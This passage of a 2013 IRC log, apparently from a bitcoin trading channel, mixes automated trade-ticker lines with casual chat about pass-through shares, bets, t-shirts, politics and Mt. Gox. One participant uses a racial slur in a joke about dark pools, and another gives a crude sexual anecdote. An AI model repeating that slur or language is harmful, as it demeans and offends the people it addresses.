0.007 BTC [+] Jul 19 23:28:29 [HAVELOCK] [SMG] 300 @ 0.00032 = 0.096 BTC [+] Jul 19 23:28:57 [BTCTC] [AMC-PT] 20 @ 0.002649 = 0.053 BTC [+] Jul 19 23:30:09 [HAVELOCK] [SMG] 10 @ 0.00032 = 0.0032 BTC [+] Jul 19 23:30:18 [HAVELOCK] [SMG] 3 @ 0.00032 = 0.001 BTC [+] Jul 19 23:30:25 [HAVELOCK] [SMG] 1 @ 0.00032 BTC [+] Jul 19 23:32:26 [HAVELOCK] [AM100] 13 @ 0.045999 = 0.598 BTC [+] Jul 19 23:32:34 [HAVELOCK] [AM100] 115 @ 0.046 = 5.29 BTC [+] Jul 19 23:32:44 [HAVELOCK] [SDSTM] 7 @ 0.0109 = 0.0763 BTC [-] Jul 19 23:33:05 [HAVELOCK] [SMG] 18 @ 0.00032 = 0.0058 BTC [+] Jul 19 23:33:15 [HAVELOCK] [SMG] 111 @ 0.000291 = 0.0323 BTC [-] Jul 19 23:33:51 [BTCTC] [AMC-PT] 185 @ 0.002649 = 0.4901 BTC [+] Jul 19 23:34:08 [HAVELOCK] [SMG] 53 @ 0.00032 = 0.017 BTC [+] Jul 19 23:35:13 how old are you, tat? Jul 19 23:35:47 [HAVELOCK] [AM100] 30 @ 0.045 = 1.35 BTC [-] Jul 19 23:37:15 34 Jul 19 23:37:18 you? Jul 19 23:37:19 He's a classmate of Garr Jul 19 23:38:56 [BTCTC] [AMC-PT] 250 @ 0.002649 = 0.6623 BTC [+] Jul 19 23:39:16 28 :) Jul 19 23:39:41 [BTCTC] [AMC-PT] 45 @ 0.002649 = 0.1192 BTC [+] Jul 19 23:39:42 [BTCTC] [AMC-PT] 2355 @ 0.00265 = 6.2408 BTC [+] Jul 19 23:40:03 Why do you ask? Jul 19 23:40:13 was I misbehaving? Jul 19 23:41:26 haha no.. i was just thinking about "who are the people behind those names" Jul 19 23:41:46 He isn't really a person Jul 19 23:42:06 [HAVELOCK] [AM100] 35 @ 0.045 = 1.575 BTC [-] Jul 19 23:42:08 More so Cylon than anything else Jul 19 23:42:14 you'll find most regulars here are in their 30s I think Jul 19 23:42:17 [BTCTC] [B.YABMC] 1 @ 0.002512 BTC [+] Jul 19 23:42:18 [BTCTC] [AMC-PT] 35 @ 0.00265 = 0.0928 BTC [+] Jul 19 23:42:22 [BTCTC] [B.YABMC] 2 @ 0.002511 = 0.005 BTC [-] Jul 19 23:42:23 [BTCTC] [B.YABMC] 50 @ 0.00251 = 0.1255 BTC [-] Jul 19 23:42:25 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [-] Jul 19 23:42:27 yea i think so, too Jul 19 23:42:27 [BTCTC] [B.YABMC] 1 @ 0.002404 BTC [-] Jul 19 23:42:28 [BTCTC] [B.YABMC] 200 @ 0.002404 = 0.4808 BTC [-] Jul 19 23:42:30 [BTCTC] [B.YABMC] 1 @ 0.002402 BTC [-] Jul 19 23:43:03 ;;tslb Jul 19 23:43:06 Time since last block: 33 minutes and 20 seconds Jul 19 23:43:06 [HAVELOCK] [SMG] 724 @ 0.00032 = 0.2317 BTC [+] Jul 19 23:43:22 ;;nethash Jul 19 23:43:23 223942.22109 Jul 19 23:43:26 .n Jul 19 23:43:27 224088.254117 Jul 19 23:43:53 no one is shipping anything Jul 19 23:44:16 [BTCTC] [AMC-PT] 277 @ 0.002605 = 0.7216 BTC [-] Jul 19 23:44:18 [BTCTC] [AMC-PT] 1397 @ 0.002602 = 3.635 BTC [-] Jul 19 23:44:19 [BTCTC] [AMC-PT] 100 @ 0.002601 = 0.2601 BTC [-] Jul 19 23:44:21 [BTCTC] [AMC-PT] 2 @ 0.0026 = 0.0052 BTC [-] Jul 19 23:44:22 [BTCTC] [AMC-PT] 15 @ 0.0026 = 0.039 BTC [-] Jul 19 23:44:23 [BTCTC] [AMC-PT] 209 @ 0.0026 = 0.5434 BTC [-] Jul 19 23:44:45 [BTCTC] [AMC-PT] 125 @ 0.00265 = 0.3313 BTC [+] Jul 19 23:45:21 mircea_popescu , deposit please Jul 19 23:46:18 [HAVELOCK] [AM100] 200 @ 0.0448 = 8.96 BTC [-] Jul 19 23:46:35 [HAVELOCK] [AM100] 200 @ 0.0449 = 8.98 BTC [+] Jul 19 23:47:05 [HAVELOCK] [AM100] 3 @ 0.04477778 = 0.1343 BTC [-] Jul 19 23:47:08 [BTCTC] [BITVPS] 20 @ 0.001802 = 0.036 BTC [-] Jul 19 23:47:09 [HAVELOCK] [AM100] 7 @ 0.04471 = 0.313 BTC [-] Jul 19 23:47:11 [HAVELOCK] [AM100] 76 @ 0.0447001 = 3.3972 BTC [-] Jul 19 23:47:13 [HAVELOCK] [AM100] 12 @ 0.0447 = 0.5364 BTC [-] Jul 19 23:47:15 [HAVELOCK] [AM100] 1 @ 0.0446 BTC [-] Jul 19 23:47:17 [HAVELOCK] [AM100] 3 @ 0.0445 = 0.1335 BTC [-] Jul 19 23:47:18 [HAVELOCK] [AM100] 100 @ 0.04477779 = 4.4778 BTC [+] Jul 19 23:48:53 [BTCTC] [AMC-PT] 440 @ 0.00265 = 1.166 BTC [+] Jul 19 23:49:07 [BTCTC] [AMC-PT] 1991 @ 0.0026 = 5.1766 BTC [-] Jul 19 23:49:52 [HAVELOCK] [SDSTM] 2 @ 0.0108 = 0.0216 BTC [-] Jul 19 23:50:58 [BTCTC] [DMS.SELLING] 20 @ 0.023997 = 0.4799 BTC [+] Jul 19 23:52:27 [BTCTC] [AMC-PT] 1310 @ 0.00265 = 3.4715 BTC [+] Jul 19 23:52:33 jborkl you know it has to confirm first. Jul 19 23:52:50 Ukyo sup ? Jul 19 23:53:21 [HAVELOCK] [AM100] 1 @ 0.044999 BTC [+] Jul 19 23:53:50 [HAVELOCK] [HIM] 9 @ 0.272 = 2.448 BTC [+] Jul 19 23:54:02 http://thegenesisblock.com/avalon-shipping-39th-of-bitcoin-miners-600-units-in-batch-3-begin-arriving/ Jul 19 23:54:04 Avalon Shipping 39 TH/s of Bitcoin Miners - 600 Units in Batch 3 Begin Arriving - The Genesis Block Jul 19 23:54:53 [BTCTC] [COGNITIVE] 1 @ 0.756999 BTC [+] Jul 19 23:56:10 [HAVELOCK] [SMG] 56 @ 0.0003288 = 0.0184 BTC [+] Jul 19 23:56:13 [HAVELOCK] [SMG] 134 @ 0.00032885 = 0.0441 BTC [+] Jul 19 23:56:33 [HAVELOCK] [AM100] 1 @ 0.04380201 BTC [-] Jul 19 23:56:34 [HAVELOCK] [AM100] 3 @ 0.043802 = 0.1314 BTC [-] Jul 19 23:56:40 only takes about 5mos Jul 19 23:56:44 [HAVELOCK] [SMG] 10 @ 0.00032885 = 0.0033 BTC [+] Jul 19 23:57:08 Ah, thank you, I see you've just processed my withdrawal Jul 19 23:57:50 [HAVELOCK] [SMG] 500 @ 0.000327 = 0.1635 BTC [-] Jul 19 23:58:08 [HAVELOCK] [SMG] 500 @ 0.000327 = 0.1635 BTC [-] Jul 19 23:58:19 [BTCTC] [DMS.SELLING] 100 @ 0.023997 = 2.3997 BTC [+] Jul 19 23:58:32 [HAVELOCK] [SMG] 500 @ 0.000327 = 0.1635 BTC [-] Jul 19 23:58:38 [BTCTC] [ASICMINER-PT] 2 @ 4.737 = 9.474 BTC [+] Jul 19 23:58:40 31 here (nobody asked) Jul 19 23:58:40 [BTCTC] [COGNITIVE] 2 @ 0.759 = 1.518 BTC [+] Jul 19 23:58:57 but we assumed! Jul 19 23:59:01 :D Jul 19 23:59:06 Actually I don't see the transaction in the blockchain yet. Jul 19 23:59:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.045499 = 0.091 BTC [-] Jul 19 23:59:39 [HAVELOCK] [SMG] 2000 @ 0.000327 = 0.654 BTC [-] Jul 20 00:00:15 [BTCTC] [DMS.SELLING] 19 @ 0.023997 = 0.4559 BTC [+] Jul 20 00:00:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.045499 = 0.091 BTC [-] Jul 20 00:00:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.0455 = 0.2275 BTC [+] Jul 20 00:01:05 so when's the TAT custom t-shirt order coming in? ;) Jul 20 00:01:11 [MPEX] [S.MG] 10000 @ 0.000295 = 2.95 BTC [+] Jul 20 00:01:13 [BTCTC] [COGNITIVE] 1 @ 0.81 BTC [+] Jul 20 00:01:16 [BTCTC] [COGNITIVE] 1 @ 0.83 BTC [+] Jul 20 00:01:23 lol i def do not know Garr Jul 20 00:01:44 i'm the only one that bothered to negrate him last i checked Jul 20 00:02:15 [HAVELOCK] [AM100] 90 @ 0.04380101 = 3.9421 BTC [-] Jul 20 00:02:21 or he was joking Jul 20 00:03:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.045559 = 0.0911 BTC [+] Jul 20 00:03:53 t-shirt? Jul 20 00:04:12 [BTCTC] [DMS.SELLING] 20 @ 0.023997 = 0.4799 BTC [+] Jul 20 00:04:20 https://bitcointalk.org/index.php?topic=246518.0 Jul 20 00:04:26 [CLOSED] [18 sold] [GB #2] Grilled Cat Identity silkscreened t-shirts! $15+S&H Jul 20 00:04:32 everybody who's anybody is getting shirts made ;p Jul 20 00:04:47 [HAVELOCK] [AM100] 1 @ 0.043802 BTC [+] Jul 20 00:04:52 [HAVELOCK] [AM100] 100 @ 0.0439 = 4.39 BTC [+] Jul 20 00:04:57 problem is that IRL i'm a notorius cat lover Jul 20 00:05:11 me too, my poor little girl had a tooth pulled today :( Jul 20 00:05:12 so this shirt would require bothersome explaining Jul 20 00:05:16 haha Jul 20 00:05:17 [HAVELOCK] [AM100] 1 @ 0.043802 BTC [-] Jul 20 00:05:19 Ah urge to hold off on selling Jul 20 00:05:35 [HAVELOCK] [AM1] 1 @ 4.65 BTC [-] Jul 20 00:05:42 [HAVELOCK] [SMG] 2500 @ 0.000328 = 0.82 BTC [+] Jul 20 00:05:43 truthfully, i'd love to screenprint stock certificates or something, but it's kind of a useless thing for the bitcoin world Jul 20 00:05:49 [HAVELOCK] [AM100] 2 @ 0.044999 = 0.09 BTC [+] Jul 20 00:06:56 http://scammer-ianbakewell.com/assets/ianbakewell_sock.jpg << he kinda looks like a dork tbh Jul 20 00:07:08 maybe certificates of authenticity for casascius coins Jul 20 00:07:29 topace_ http://trilema.com/2013/smg-ipo-succeeded-other-statements/ Jul 20 00:07:54 HUGO BOSS Jul 20 00:08:05 what, did he get the shirt and windbreaker in a package deal or something? Jul 20 00:08:21 http://www.dailymail.co.uk/sciencetech/article-2370100/Scientists-GIANT-Pandoravirus-come-alien-planet.html Jul 20 00:08:23 Scientists find GIANT Pandoravirus that could have come from an alien planet | Mail Online Jul 20 00:09:11 sweet Jul 20 00:09:19 i've been drooling over pictures of old bearer bonds for the past week or so Jul 20 00:09:21 thats some sci fi shit Jul 20 00:09:25 so elegant Jul 20 00:09:26 [BTCTC] [AMC-PT] 275 @ 0.002649 = 0.7285 BTC [-] Jul 20 00:09:31 [BTCTC] [AMC-PT] 502 @ 0.002649 = 1.3298 BTC [-] Jul 20 00:09:36 http://gigaom.com/2013/07/19/someone-just-sold-a-bitcoin-business-for-11-4m-its-a-first-but-the-buyers-anonymous/ Jul 20 00:09:40 are you hacks familiar with open-transactions Jul 20 00:09:40 Someone just sold a Bitcoin business for $11.4M It’s a first, but the buyer’s anonymous — Jul 20 00:09:41 i got a gigaom link Jul 20 00:09:44 KRS- yes Jul 20 00:10:13 nubbins` late 1800s ? Jul 20 00:10:22 mp, did you see my bet? Jul 20 00:10:44 yeah late 18s early 19s Jul 20 00:11:00 http://www.denverstockexchange.com/images/Canada%20General_full.jpg Jul 20 00:11:00 oh nice grats on a news site admitting mpex exists! Jul 20 00:11:06 [BTCTC] [AMC-PT] 2600 @ 0.00265 = 6.89 BTC [+] Jul 20 00:11:09 ThickAsThieves no ? you breaking justdice too ? Jul 20 00:11:31 ThickAsThieves wait till they discover all the other shit lieing in wait. Jul 20 00:11:47 mpex is like the ultimate alice in wonderland rabbit hole hidden in plain sight. Jul 20 00:12:05 nubbins` yeah, arguably the pinnacle of drawn aesthetics. Jul 20 00:12:22 "(although mathematics suggest those are actually only 177 percent and 75 percent premiums respectively)." Jul 20 00:12:28 lmao erik blew the maffs. Jul 20 00:12:52 shame i don't have access to a litho studio, or, y'know, talent Jul 20 00:12:53 lol Jul 20 00:13:15 mircea_popescu: pm Jul 20 00:13:22 nubs i have access to wholesale printers Jul 20 00:13:31 Ukyo i don't see anything ? Jul 20 00:13:46 nubbins` i thought you had access to some talent Jul 20 00:13:55 [BTCTC] [COGNITIVE] 1 @ 0.839447 BTC [+] Jul 20 00:14:14 sorry, my sentence was ambiguous. i have access to talent, just not talent ;) Jul 20 00:14:19 not for this sort of thing anyway Jul 20 00:14:27 [BTCTC] [AMC-PT] 402 @ 0.00258 = 1.0372 BTC [-] Jul 20 00:14:39 nubbis: https://bitcointalk.org/index.php?topic=221343.0 << first association when you said "casascius certificates" Jul 20 00:14:56 yeah, see, something like that. Jul 20 00:15:06 except that's just a digital print, AKA a photocopy Jul 20 00:15:19 i'd print em by hand on nice thick 100% cotton paper Jul 20 00:15:25 [BTCTC] [TAT.ASICMINER] 13 @ 0.045599 = 0.5928 BTC [+] Jul 20 00:16:28 there's a reason why i operate the studio instead of producing art, this is about as fancy as i get: http://i.imgur.com/feLeauz.jpg Jul 20 00:17:00 not bad Jul 20 00:17:11 orange sucks, should have been solid Jul 20 00:17:13 it looks like the soviets drew it Jul 20 00:17:19 heh, yep Jul 20 00:17:38 i ended up giving all of those away Jul 20 00:18:09 [BTCTC] [COGNITIVE] 1 @ 0.839 BTC [-] Jul 20 00:18:34 [BTCTC] [AMC-PT] 410 @ 0.00265 = 1.0865 BTC [+] Jul 20 00:18:40 [HAVELOCK] [SMG] 684 @ 0.00032885 = 0.2249 BTC [+] Jul 20 00:18:48 around bathroom stalls ? Jul 20 00:19:23 [BTCTC] [AMC-PT] 350 @ 0.00265 = 0.9275 BTC [+] Jul 20 00:19:26 [BTCTC] [AMC-PT] 85 @ 0.00265 = 0.2253 BTC [+] Jul 20 00:19:33 [MPEX] [S.MG] 6800 @ 0.000295 = 2.006 BTC [+] Jul 20 00:19:35 [HAVELOCK] [SMG] 6800 @ 0.00032 = 2.176 BTC [-] Jul 20 00:19:38 [BTCTC] [AMC-PT] 100 @ 0.00265 = 0.265 BTC [+] Jul 20 00:19:57 [BTCTC] [DMS.SELLING] 1 @ 0.023998 BTC [+] Jul 20 00:20:41 no, although that'd be a great conversation starter Jul 20 00:20:57 "cum here often?" Jul 20 00:21:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003997 = 0.008 BTC [+] Jul 20 00:21:37 lol Jul 20 00:21:43 [MPEX] [S.MG] 10000 @ 0.00022222 = 2.2222 BTC [-] Jul 20 00:21:45 [MPEX] [S.MG] 10000 @ 0.000222 = 2.22 BTC [-] Jul 20 00:21:46 [MPEX] [S.MG] 30000 @ 0.00022009 = 6.6027 BTC [-] Jul 20 00:21:59 [MPEX] [S.MG] 5000 @ 0.00022002 = 1.1001 BTC [-] Jul 20 00:22:01 [MPEX] [S.MG] 5000 @ 0.00022 = 1.1 BTC [-] Jul 20 00:22:02 [MPEX] [S.MG] 20000 @ 0.000215 = 4.3 BTC [-] Jul 20 00:22:04 [MPEX] [S.MG] 20000 @ 0.00021 = 4.2 BTC [-] Jul 20 00:22:09 [MPEX] [S.MG] 20000 @ 0.0002 = 4 BTC [-] Jul 20 00:22:19 [MPEX] [S.MG] 19000 @ 0.0002 = 3.8 BTC [-] Jul 20 00:22:21 [MPEX] [S.MG] 61000 @ 0.0002 = 12.2 BTC [-] Jul 20 00:22:23 well then! Jul 20 00:23:17 anyway, i gotta mail out the rest of these friedcat shirts, bbl Jul 20 00:23:38 [HAVELOCK] [SMG] 2216 @ 0.00032 = 0.7091 BTC [-] Jul 20 00:23:40 [HAVELOCK] [SMG] 495 @ 0.000311 = 0.1539 BTC [-] Jul 20 00:23:43 [HAVELOCK] [SMG] 97 @ 0.000291 = 0.0282 BTC [-] Jul 20 00:23:45 [HAVELOCK] [SMG] 7 @ 0.00029001 = 0.002 BTC [-] Jul 20 00:23:47 [HAVELOCK] [SMG] 700 @ 0.00029 = 0.203 BTC [-] Jul 20 00:23:49 [HAVELOCK] [SMG] 1000 @ 0.00028 = 0.28 BTC [-] Jul 20 00:23:51 [HAVELOCK] [SMG] 1000 @ 0.000271 = 0.271 BTC [-] Jul 20 00:23:53 [HAVELOCK] [SMG] 1485 @ 0.00027 = 0.401 BTC [-] Jul 20 00:24:22 cya nubbins Jul 20 00:24:25 whoa look at s.mg, 50 btc within 10% Jul 20 00:24:56 [HAVELOCK] [SMG] 2015 @ 0.00027 = 0.5441 BTC [-] Jul 20 00:25:44 [BTCTC] [TAT.ASICMINER] 16 @ 0.0456 = 0.7296 BTC [+] Jul 20 00:25:49 mp, the bet i was referring to is one i submitted to bitbet Jul 20 00:26:19 hm ? Jul 20 00:26:24 TaT, you made an S.MG PT on btct.co, I'm supposed to make that... Jul 20 00:26:28 o. you know i read maybe 1 in 100 of those. Jul 20 00:26:31 contentious shit or w/e Jul 20 00:26:53 it names you thogh :) Jul 20 00:27:02 [17:26] TaT, you made an S.MG PT on btct.co, I'm supposed to make that... <<< You were? Jul 20 00:27:30 Well I'll need to make a S.MG-PT, I do it for each MPEx stock. Jul 20 00:27:53 and competition in teh finances emerges Jul 20 00:28:11 what's the point of PTing it, except that it gives people opportunity to buy it without paying the 30 btc fee on mpex ? Jul 20 00:28:44 I didn't know it was a "thing" Namworld Jul 20 00:28:53 your SDICE came after DT's Jul 20 00:29:06 if I recall Jul 20 00:29:41 Apocalyptic generally pting has two advantages. one is that it maintains market openness Jul 20 00:29:53 Yeah, no problem with many PT being issued. Jul 20 00:29:54 the other is that it gives people a chance to qualify in the profession of btc financier Jul 20 00:30:04 [HAVELOCK] [HIM] 1 @ 0.272 BTC [+] Jul 20 00:30:05 It's just slightly redundant. But competition is healthy Jul 20 00:30:08 [HAVELOCK] [HIM] 4 @ 0.2691 = 1.0764 BTC [-] Jul 20 00:30:13 [HAVELOCK] [HIM] 10 @ 0.269 = 2.69 BTC [-] Jul 20 00:30:18 [BTCTC] [COGNITIVE] 1 @ 0.839443 BTC [+] Jul 20 00:30:20 mircea, didn't think of that second Jul 20 00:30:57 yeah. think about it, "so what have you done ? well, i ran x y z pt for a year" is bettert tyhan "well nothing because tghere's nothing that needs doing" Jul 20 00:31:12 yeah clearly Jul 20 00:31:28 Namworld, it seems that being second is what makes something redundant Jul 20 00:31:49 and you get to perform some basic asset operations Jul 20 00:32:06 not that mp needs it, but a PT also exposes the underlying asset/business to new audiences Jul 20 00:32:38 that's what i wrote above it seems TaT :) Jul 20 00:32:41 oh sry Jul 20 00:33:06 hashpacks..too good to be true. Jul 20 00:33:10 working as intended usagi Jul 20 00:33:11 usagi, not negating it completely though Jul 20 00:33:16 now i havce to deal with the rubes Jul 20 00:33:20 you introduce a middle-man Jul 20 00:33:32 like the inevitable weekly "when are divs?" messages Jul 20 00:34:17 today i got a pm warning me about my investment in SMG Jul 20 00:34:37 no Jul 20 00:34:47 don't leave us hanging, what was the warning? Jul 20 00:35:00 just another gamer industry guy predicting the failure of SMG Jul 20 00:35:17 [BTCTC] [COGNITIVE] 1 @ 0.839449 BTC [+] Jul 20 00:35:21 that also didnt understand that running a PT means i'm a middleman, not necessarily an invetsor Jul 20 00:36:04 it's funny that people like thestringpuller and this guy today all presume mp will do the worst possible thing Jul 20 00:36:11 [HAVELOCK] [AM100] 1 @ 0.044998 BTC [-] Jul 20 00:36:14 well, the game already slipped. clearly it's vaporware. Jul 20 00:36:20 ThickAsThieves you're probably exposed as lopng at least for limited intervals running a pt Jul 20 00:36:25 so very technically, an investor Jul 20 00:36:33 true Jul 20 00:36:55 in this case me having more shares than i need is intentional, Jul 20 00:36:58 I lik ethe company Jul 20 00:38:11 awww my bet got rejected Jul 20 00:38:43 unverifiable? Jul 20 00:38:45 meh Jul 20 00:38:59 Satoshi Dice Bought by Mircea Popescu Jul 20 00:39:16 [MPEX] [S.MG] 14000 @ 0.0002 = 2.8 BTC [-] Jul 20 00:39:18 [MPEX] [S.MG] 33391 @ 0.00019111 = 6.3814 BTC [-] Jul 20 00:39:38 [BTCTC] [COGNITIVE] 1 @ 0.839449 BTC [+] Jul 20 00:40:39 well thats partly why i was betting on MP Jul 20 00:40:50 his position to buy looks a lot different than anyone else Jul 20 00:40:54 ThickAsThieves it is unverifiable. how would one verify it ? Jul 20 00:41:37 I'd accept yours and Erik's testimony Jul 20 00:42:15 [BTCTC] [AMC-PT] 2 @ 0.00265 = 0.0053 BTC [+] Jul 20 00:42:57 ... Jul 20 00:43:15 [BTCTC] [AMC-PT] 9 @ 0.00265 = 0.0239 BTC [+] Jul 20 00:43:18 this is no "no, it's not me" either Jul 20 00:43:18 how'd you go about getting such fancy stuff ? Jul 20 00:44:51 [HAVELOCK] [AM100] 1 @ 0.0447 BTC [-] Jul 20 00:45:15 http://www.aljazeera.com/news/americas/2013/07/2013719191832593143.html Jul 20 00:45:19 Judge orders Detroit to pull bankruptcy bid - Americas - Al Jazeera English Jul 20 00:45:19 this is pretty much the future of the us. Jul 20 00:45:28 During a conference on Friday in which he defended the bankruptcy suit, Orr said that he was aware that there were 20,000 retirees and 97,000 workers who may suffer, but the majority of people in Detroit would benefit. Jul 20 00:45:28 "There are 700,000 citizens who don't deserve a 55 minute rapid response time, who don't deserve endemic blight and crime, who don't deserve no hope and future and just continued debt over debt and borrowing," he said. Jul 20 00:45:33 krugman economy. Jul 20 00:46:47 funny thing: today at the movies i saw a Simona Popescu in the credits, it that a common romanian name or is someone of your family working on shitty holywood films mircea ? Jul 20 00:47:20 popescu is the most common romanian family name Jul 20 00:47:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.045599 = 0.1368 BTC [-] Jul 20 00:48:18 [BTCTC] [AMC-PT] 119 @ 0.00264 = 0.3142 BTC [-] Jul 20 00:49:11 [BTCTC] [AMC-PT] 150 @ 0.00264 = 0.396 BTC [-] Jul 20 00:52:26 [BTCTC] [DMS.MINING] 1 @ 0.016238 BTC [-] Jul 20 00:52:49 [HAVELOCK] [SDSTM] 220 @ 0.0109 = 2.398 BTC [+] Jul 20 00:53:24 When you spend on a whim just because of what the electors want now instead of what needs to be done for the long-term, you get into debt wasting money on unimportant stuff or overdoing things. Jul 20 00:53:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003989 BTC [-] Jul 20 00:54:31 Then decades down the road, you're out of gas for insta-gratifying electors. Jul 20 00:55:12 [HAVELOCK] [AM100] 1 @ 0.0445 BTC [-] Jul 20 00:55:18 [HAVELOCK] [AM100] 1 @ 0.04381001 BTC [-] Jul 20 00:55:21 yes, but if you don't the electors kick you out. Jul 20 00:55:29 [HAVELOCK] [AM100] 52 @ 0.04381 = 2.2781 BTC [-] Jul 20 00:55:55 mike_c this is why democracy doesn't work Jul 20 00:56:01 agreed. Jul 20 00:56:10 the only thing the mob can agree on is that it needs to work less, to be paid more or to work less and be paid more. Jul 20 00:56:17 i.e. france Jul 20 00:56:26 mike_c, definitely Jul 20 00:57:28 [BTCTC] [COGNITIVE] 2 @ 0.839449 = 1.6789 BTC [+] Jul 20 00:58:01 in that sense monarchy is great (in other senses too) Jul 20 00:58:09 I work less and earn more. Not that someone gave it to me on a platter... Jul 20 00:58:27 [MPEX] [S.MG] 12946 @ 0.0002 = 2.5892 BTC [+] Jul 20 00:58:39 you switched from IT to finance Namworld, of course you do Jul 20 00:58:53 Apocalyptic problem with monarchy is that the king sucks. Jul 20 00:59:04 its good to be the king Jul 20 00:59:15 Well I don't find it too hard, actually. Jul 20 01:00:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.045599 = 0.228 BTC [-] Jul 20 01:00:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.0456 = 0.456 BTC [+] Jul 20 01:01:33 i broke my cock ;/ Jul 20 01:01:40 dafuq Jul 20 01:02:15 this is the fucking problem with big schlongs. i was doing this chick earlier, and she was all tight andf sweet Jul 20 01:02:18 and now im fucking bleeding Jul 20 01:04:10 [BTCTC] [COGNITIVE] 3 @ 0.839449 = 2.5183 BTC [+] Jul 20 01:08:54 [BTCTC] [COGNITIVE] 1 @ 0.831 BTC [-] Jul 20 01:09:49 [BTCTC] [ASICMINER-PT] 4 @ 4.650102 = 18.6004 BTC [-] Jul 20 01:09:51 [BTCTC] [ASICMINER-PT] 13 @ 4.650101 = 60.4513 BTC [-] Jul 20 01:09:53 [BTCTC] [ASICMINER-PT] 1 @ 4.650101 BTC [-] Jul 20 01:09:55 [BTCTC] [ASICMINER-PT] 5 @ 4.6501 = 23.2505 BTC [-] Jul 20 01:14:26 [HAVELOCK] [SDSTM] 6 @ 0.01175 = 0.0705 BTC [+] Jul 20 01:14:56 [HAVELOCK] [SMG] 6 @ 0.000314 = 0.0019 BTC [+] Jul 20 01:15:21 [BTCTC] [DMS.MINING] 5 @ 0.016 = 0.08 BTC [-] Jul 20 01:16:28 [BTCTC] [DMS.MINING] 14 @ 0.016238 = 0.2273 BTC [+] Jul 20 01:16:45 [BTCTC] [DMS.MINING] 25 @ 0.016239 = 0.406 BTC [+] Jul 20 01:17:39 [HAVELOCK] [SMG] 1244 @ 0.000314 = 0.3906 BTC [+] Jul 20 01:17:43 [HAVELOCK] [SMG] 2500 @ 0.000319 = 0.7975 BTC [+] Jul 20 01:17:44 [HAVELOCK] [SMG] 5000 @ 0.000328 = 1.64 BTC [+] Jul 20 01:17:45 [HAVELOCK] [SMG] 7681 @ 0.0003289 = 2.5263 BTC [+] Jul 20 01:17:47 [HAVELOCK] [SMG] 947 @ 0.000333 = 0.3154 BTC [+] Jul 20 01:17:49 [HAVELOCK] [SMG] 4628 @ 0.00037 = 1.7124 BTC [+] Jul 20 01:17:52 yeesh Jul 20 01:17:52 [BTCTC] [DMS.MINING] 5 @ 0.01624 = 0.0812 BTC [+] Jul 20 01:18:00 [BTCTC] [DMS.SELLING] 3 @ 0.023998 = 0.072 BTC [+] Jul 20 01:18:12 lol it's a race to 5. asicminer vs minigame Jul 20 01:18:12 i guess it's only a few btc Jul 20 01:18:34 [BTCTC] [DMS.MINING] 12 @ 0.016243 = 0.1949 BTC [+] Jul 20 01:18:37 a warning pm! Jul 20 01:19:00 i bet there were a few lels contained within Jul 20 01:19:11 wait, shit, that was like an hour ago, sorry Jul 20 01:19:11 [BTCTC] [BTC-BOND] 1 @ 0.009995 BTC [+] Jul 20 01:19:18 say wut ? Jul 20 01:19:28 lol Jul 20 01:19:44 [BTCTC] [LTC-ATF.B2] 1 @ 0.00999 BTC [+] Jul 20 01:19:54 !t m s.mg Jul 20 01:19:56 [MPEX:S.MG] 1D: 0.000181 / 0.00021404 / 0.0004 (758369 shares, 162.33 BTC), 7D: 0.00013 / 0.0002082 / 0.0004 (1014721 shares, 211.26 BTC), 30D: 0.0001 / 0.00020101 / 0.0004 (1123015 shares, 225.75 BTC) Jul 20 01:20:17 i imagine the ppl with warrants at 1.x are feeling like champs nao Jul 20 01:20:32 https://bitcointalk.org/index.php?topic=248417.0 Jul 20 01:20:37 THE TRUTH: Can someone withdraw fiat money from MTGOX? Jul 20 01:20:37 this sounds like a hollywood movie. Jul 20 01:20:42 [HAVELOCK] [SMG] 1000 @ 0.0003 = 0.3 BTC [-] Jul 20 01:21:11 ASICMINER week dividend will go to a new height. Estimated 0.04 to 0.05 Jul 20 01:21:16 thicks you got a comment on that ? Jul 20 01:21:23 or if not a comment could you say something anyway Jul 20 01:21:24 like a poem ? Jul 20 01:21:27 haiku ? Jul 20 01:22:20 https://bitcointalk.org/index.php?topic=257358.0 Jul 20 01:22:27 Stealth dark pool orders on Mt. Gox, Bitstamp, and BTC-E Jul 20 01:22:38 stealth. darker than dark. we could go as far as to say these are the original nigger pools. Jul 20 01:23:36 comment on what? Jul 20 01:23:44 who said that about div? Jul 20 01:24:23 random btctalk expert Jul 20 01:25:00 i have no info that leans to that Jul 20 01:25:20 it is "known" that some chinese sites are selling preorders Jul 20 01:25:30 so maybe AM is getting that pay Jul 20 01:25:32 i dunno Jul 20 01:25:49 but english-speakers do seem to be second-class now Jul 20 01:26:47 [BTCTC] [AMC-PT] 160 @ 0.00264 = 0.4224 BTC [-] Jul 20 01:27:23 today i got a pm warning me about my investment in SMG Jul 20 01:27:33 ^^ that was what i was referring to about the lels Jul 20 01:27:53 lels? i cant keep up... Jul 20 01:28:02 lols :( Jul 20 01:28:19 [HAVELOCK] [AM100] 1 @ 0.044995 BTC [+] Jul 20 01:28:23 sorry, i'm really just here to confuse people Jul 20 01:28:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.045551 = 0.1367 BTC [-] Jul 20 01:30:01 ThickAsThieves https://bitcointalk.org/index.php?topic=258858.0 that's where it was Jul 20 01:30:50 i have the person on ignore Jul 20 01:31:00 i am quite liberal with ignoring on forums Jul 20 01:31:42 How much extra did Erik pay over 0.0035? There was a small amount Jul 20 01:31:48 [HAVELOCK] [SDSTM] 2 @ 0.01092 = 0.0218 BTC [-] Jul 20 01:32:02 [BTCTC] [AMC-PT] 400 @ 0.00264 = 1.056 BTC [-] Jul 20 01:32:03 i think that guy is just confused Jul 20 01:32:05 it was super small i think, i wasnt totally paying attention Jul 20 01:32:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.04555 = 0.4555 BTC [-] Jul 20 01:32:11 although he acts suspiciously like the spam bots Jul 20 01:32:18 like 40btc total Jul 20 01:32:33 [HAVELOCK] [SDSTM] 73 @ 0.0109 = 0.7957 BTC [-] Jul 20 01:32:39 https://bitcointalk.org/index.php?topic=258170.msg2764951#msg2764951 Jul 20 01:32:42 MTGOX Ponzi? Jul 20 01:32:43 